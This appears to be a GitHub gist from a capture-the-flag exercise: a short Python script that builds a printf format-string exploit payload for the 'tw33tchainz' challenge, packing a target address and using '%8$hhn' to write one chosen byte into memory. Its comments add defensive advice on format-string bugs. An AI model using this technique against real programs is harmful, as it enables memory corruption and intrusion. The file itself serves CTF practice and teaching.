
@Newbrict /get_tweet.py Secret
Created Mar 19, 2015

Create the format string to exploit tw33tchainz printf statement
import sys
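# Build the printf format-string input for the tw33tchainz challenge binary.
#
# Usage: get_tweet.py <address> <tweetNum> <writeVal>
#   address  - integer literal for the base address (e.g. 0x-prefixed hex)
#   tweetNum - integer offset that is added to the base address
#   writeVal - hex digits of the byte value, without a 0x prefix
#
# Writes to stdout, without a trailing newline: "A", the address bytes in
# little-endian order, then "%<NNN>x%8$hhn".
#
# Review note: the original evaluated the arguments with eval(), which runs
# any Python expression found on the command line. They are parsed as plain
# integers here; inputs that relied on expression syntax are now rejected
# with ValueError.
#
# Defensive context: a string like this only has an effect when the target
# passes attacker-controlled text as the printf format argument. Calling
# printf("%s", buf) and building with -Wformat-security address that class.
#
# NOTE(review): chr() is used to emit raw byte values, which presumes
# Python 2 str semantics - confirm the intended interpreter.

# Parse the command line; base 0 accepts 0x-prefixed hex as well as decimal.
target = int(sys.argv[1], 0) + int(sys.argv[2], 0)

# Zero-pad to 8 hex digits so the value splits into whole bytes.
address = "%08x" % target

# Walk the two-digit pairs from last to first to get little-endian order.
little_endian = "".join(
    chr(int(address[i:i + 2], 16))
    for i in reversed(range(0, len(address), 2))
)

# %hhn stores only the low byte of the running output count. The 5 matches
# the "A" plus four address bytes written before the %x field (presumably
# the reason for the original "offset by 5"); adding 256 leaves the low byte
# unchanged while keeping the field width positive.
strValue = str(int(sys.argv[3], 16) - 5 + 256).zfill(3)

# Emit the assembled string; no newline is appended.
sys.stdout.write("A" + little_endian + "%" + strValue + "x%8$hhn")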